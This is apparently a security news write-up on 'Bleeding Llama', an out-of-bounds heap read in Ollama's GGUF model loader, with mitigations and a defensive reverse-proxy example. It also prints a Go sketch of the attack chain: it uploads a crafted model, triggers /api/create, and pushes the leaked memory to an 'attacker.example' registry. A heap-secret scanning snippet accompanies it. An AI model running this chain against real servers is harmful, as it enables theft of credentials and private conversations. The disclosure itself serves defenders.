Bleeding Llama: Critical Ollama Vulnerability Exposes Secrets on 300,000 AI Servers

On May 8, 2026, Cyera disclosed CVE-2026-7482, a critical vulnerability in Ollama, a popular framework for local LLM inference, that allows unauthenticated remote attackers to read the memory of the server process. Dubbed "Bleeding Llama" and rated CVSS 9.1, the flaw is triggered by uploading a specially crafted GGUF model file, and the affected servers are frequently exposed to the internet without authentication. The discovery challenges the prevailing assumption that running AI models on-premises inherently protects corporate data and secrets.

Key Takeaways
  • Out-of-bounds read in GGUF loader: Ollama fails to validate tensor dimensions declared in metadata against actual buffer lengths, leading to a heap memory leak during quantization via Go’s unsafe package.
  • Massive exposure: Cyera estimates that over 300,000 Ollama servers are potentially reachable globally, many of which listen on 0.0.0.0 instead of localhost and lack out-of-the-box authentication.
  • High-value data at risk: The process heap can contain environment variables, API keys, system prompts, concurrent user conversations, proprietary code, and customer contracts.
  • Immediate mitigation: Version 0.17.1 addresses the flaw. Administrators should also rotate credentials if their server was exposed and restrict network binding to local or segmented interfaces.

Technical Breakdown: From GGUF Parsing to Memory Exfiltration

The core of the vulnerability lies in the Go-based parser Ollama uses to load GGUF models, specifically within fs/ggml/gguf.go and server/quantization.go. During the quantization pipeline, the WriteTo and ConvertToF32 functions utilize the unsafe package for direct memory buffer access. The loader implicitly trusts the file's internal metadata regarding tensor offset, shape, and size. By crafting a GGUF file where the declared tensor size exceeds the actual data buffer length, an attacker forces the server to read beyond allocated heap boundaries. This reliance on the unsafe package, coupled with a lack of sanity checks, bypasses Go's memory safety guarantees and enables out-of-bounds heap reads.
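To illustrate the class of bug, consider the following Go sketch. It is not Ollama's actual code, and the struct and function names are invented for clarity, but it shows how a tensor length taken from attacker-controlled metadata, combined with unsafe.Slice and no bounds check, yields an out-of-bounds heap read, and what the corresponding sanity check looks like.

```go
package main

import (
	"fmt"
	"unsafe"
)

// tensorMeta mimics attacker-controlled GGUF metadata: the declared element
// count is trusted even though the real payload may be shorter. Illustrative
// only; the field names do not correspond to Ollama's actual structs.
type tensorMeta struct {
	declaredElems uint64 // element count taken from the file header
}

// vulnerableLoad builds a float32 view over the payload using the declared
// size. If declaredElems exceeds what the payload holds, the slice extends
// past the allocation into adjacent heap memory.
func vulnerableLoad(meta tensorMeta, payload []byte) []float32 {
	ptr := (*float32)(unsafe.Pointer(unsafe.SliceData(payload)))
	return unsafe.Slice(ptr, meta.declaredElems) // no bounds check: OOB read
}

// patchedLoad shows the kind of check that closes the hole: the declared
// tensor size must fit inside the bytes actually present in the file.
func patchedLoad(meta tensorMeta, payload []byte) ([]float32, error) {
	need := meta.declaredElems * uint64(unsafe.Sizeof(float32(0)))
	if need > uint64(len(payload)) {
		return nil, fmt.Errorf("tensor claims %d bytes, file provides %d", need, len(payload))
	}
	ptr := (*float32)(unsafe.Pointer(unsafe.SliceData(payload)))
	return unsafe.Slice(ptr, meta.declaredElems), nil
}

func main() {
	payload := make([]byte, 16)                // only 4 float32 values actually present
	meta := tensorMeta{declaredElems: 1 << 16} // header lies about the size

	if _, err := patchedLoad(meta, payload); err != nil {
		fmt.Println("rejected:", err) // the sanity check catches the mismatch
	}
	_ = vulnerableLoad // reading the unchecked slice would walk off the allocation
}
```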

The attack chain is straightforward and requires no authentication. An attacker uploads the malicious file via a simple HTTP POST request. Calling the /api/create endpoint triggers model creation and tensor processing, activating the out-of-bounds read. The leaked memory is then embedded into the resulting model artifact, which can be exfiltrated by pushing it to an attacker-controlled registry via the /api/push endpoint.
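For readers who want to map the chain onto concrete requests, the sketch below strings the steps together in Go. The endpoint paths /api/create and /api/push come from the write-up; the blob-upload step and all JSON field names are illustrative assumptions and vary between Ollama versions, and the digests are placeholders.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
	"os"
	"strings"
)

// Sketch of the reported attack flow against an exposed, unauthenticated
// Ollama instance. Endpoint paths match the advisory; the request bodies
// are placeholders, not Ollama's exact API schema.
func main() {
	target := "http://victim.example:11434" // Ollama's default port, no auth

	// 1. Upload the crafted GGUF file with a plain HTTP POST
	//    (digest handling is elided here).
	gguf, _ := os.ReadFile("crafted.gguf")
	http.Post(target+"/api/blobs/sha256:<digest>", "application/octet-stream", bytes.NewReader(gguf))

	// 2. Trigger model creation: tensor processing over the lying metadata
	//    performs the out-of-bounds read and copies heap bytes into the artifact.
	create := `{"model": "poc", "files": {"crafted.gguf": "sha256:<digest>"}}` // field names assumed
	http.Post(target+"/api/create", "application/json", strings.NewReader(create))

	// 3. Exfiltrate: push the resulting model, which now embeds leaked heap
	//    memory, to a registry the attacker controls.
	push := `{"model": "attacker.example/poc"}` // field names assumed
	resp, err := http.Post(target+"/api/push", "application/json", strings.NewReader(push))
	if err == nil {
		fmt.Println("push status:", resp.Status)
		resp.Body.Close()
	}
}
```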

Heap Exposure and the Risk of Remote Data Theft

The heap memory in the Ollama process is neither isolated by user session nor cleared between requests. Because the Go runtime manages the heap at the process level, anything the server has handled can remain resident for the life of the process: environment variables, API keys, system prompts, fragments of concurrent conversations, proprietary code, and sensitive contracts. A single remote upload of a "poisoned" model file allows an attacker to dump this material without any active interaction from the victim.
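Part of what makes a raw heap dump so valuable is that most of these secrets are plain printable strings. A minimal strings(1)-style scan, sketched below purely for illustration with a made-up key, is enough to surface them from leaked bytes embedded in a model artifact.

```go
package main

import "fmt"

// printableRuns extracts runs of printable ASCII at least minLen bytes long
// from a raw memory dump, roughly what the Unix strings(1) tool does, and the
// first thing an attacker would try against heap bytes pulled from a leaked
// model artifact.
func printableRuns(dump []byte, minLen int) []string {
	var out []string
	start := -1
	for i, b := range dump {
		if b >= 0x20 && b < 0x7f { // printable ASCII range
			if start < 0 {
				start = i
			}
			continue
		}
		if start >= 0 && i-start >= minLen {
			out = append(out, string(dump[start:i]))
		}
		start = -1
	}
	if start >= 0 && len(dump)-start >= minLen {
		out = append(out, string(dump[start:]))
	}
	return out
}

func main() {
	// Simulated heap fragment: binary noise surrounding an environment-style secret.
	dump := append([]byte{0x00, 0x7f, 0x03}, []byte("OPENAI_API_KEY=sk-example-123")...)
	dump = append(dump, 0x00, 0x01)
	for _, s := range printableRuns(dump, 8) {
		fmt.Println(s) // prints the embedded key-like string
	}
}
```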

"An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more" - Dor Attias, Cyera security researcher

Researchers noted that engineers frequently integrate Ollama with tools like Claude Code, further amplifying the risk. "On top of that, engineers often connect Ollama to tools like Claude Code. In those cases, the impact is even higher—all tool outputs flow to the Ollama server, get saved in the heap, and potentially end up in an attacker's hands." When external tools stream output to the local server, that content resides directly in memory, expanding the potential leak surface far beyond the scope of a single chatbot interaction.

Deployment Vulnerabilities: Why Ollama Instances Are Frequently Exposed

Ollama has become the de facto standard for on-premises LLM deployment, surpassing 171,000 GitHub stars and 100 million downloads on Docker Hub. Despite being designed for local use, the framework provides no native authentication for its REST API and is often configured to listen on 0.0.0.0 rather than localhost. The ease of installation via Docker or automation scripts often leads users to overlook network binding parameters, leaving the service accessible to any IP address that can reach the host. This turns corporate installations into unprotected public endpoints, particularly when containers are deployed on unsegmented internal networks.

While Cyera estimates 300,000 servers are exposed globally, the research notes a limitation: it is unclear how many of them are reliably exploitable, or how many sit on unsegmented internal networks rather than the public internet. The figure should therefore be read as a measure of potential attack surface, not a count of compromised systems.

Mitigation and Remediation

  • Update to Ollama 0.17.1 immediately. This release contains the fix for the out-of-bounds read in the GGUF loader. Administrators of both internal and external instances should prioritize this upgrade.
  • Restrict network binding. Configure the service to listen only on localhost or strictly segmented internal interfaces. Avoid the 0.0.0.0 default unless an authenticated reverse proxy is filtering requests.
  • Rotate credentials and secrets. If an Ollama server was exposed to the internet or an expansive LAN, assume that environment variables and memory-resident secrets may have been compromised. Immediate rotation of API keys, tokens, and credentials is required.
  • Implement perimeter authentication. Since Ollama lacks native authentication, it is essential to deploy a reverse proxy with strong authentication or a VPN in front of exposed endpoints. Monitor logs for unusual GGUF file uploads to /api/create.
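As a rough illustration of the last point, the sketch below places a minimal Go reverse proxy with bearer-token authentication in front of an Ollama instance bound to localhost. The OLLAMA_PROXY_TOKEN variable and the listen address are placeholders of my choosing, and most deployments would use an established proxy such as nginx or Caddy, or a VPN, instead; the point is simply that nothing reaches the Ollama API without presenting a credential.

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

// Minimal bearer-token gate in front of a locally bound Ollama instance.
// Ollama itself keeps listening on 127.0.0.1:11434; only this proxy is
// reachable from the network.
func main() {
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	token := os.Getenv("OLLAMA_PROXY_TOKEN") // hypothetical variable set by the operator
	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get("Authorization")
		want := "Bearer " + token
		// Reject everything if no token is configured or the header does not match.
		if token == "" || subtle.ConstantTimeCompare([]byte(got), []byte(want)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		// Log model-creation calls to help spot unexpected GGUF uploads.
		if r.URL.Path == "/api/create" {
			log.Printf("model create from %s", r.RemoteAddr)
		}
		proxy.ServeHTTP(w, r)
	})

	log.Fatal(http.ListenAndServe("0.0.0.0:11435", handler)) // placeholder listen address
}
```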

The Fallacy of Implicit On-Premises Security

The discovery of Bleeding Llama dismantles the popular belief that moving data from the cloud to local servers provides inherent protection. When the most popular framework for local AI inference can be compromised by a single poisoned model file, the issue is no longer where the data resides, but the security of the software processing it. The lack of default authentication and the tendency to expose services across all interfaces make on-premises deployments a data breach waiting to happen—unless patching, segmentation, and hardening become core components of the AI stack.

Information has been verified against cited sources and is current as of the time of publication.

Sources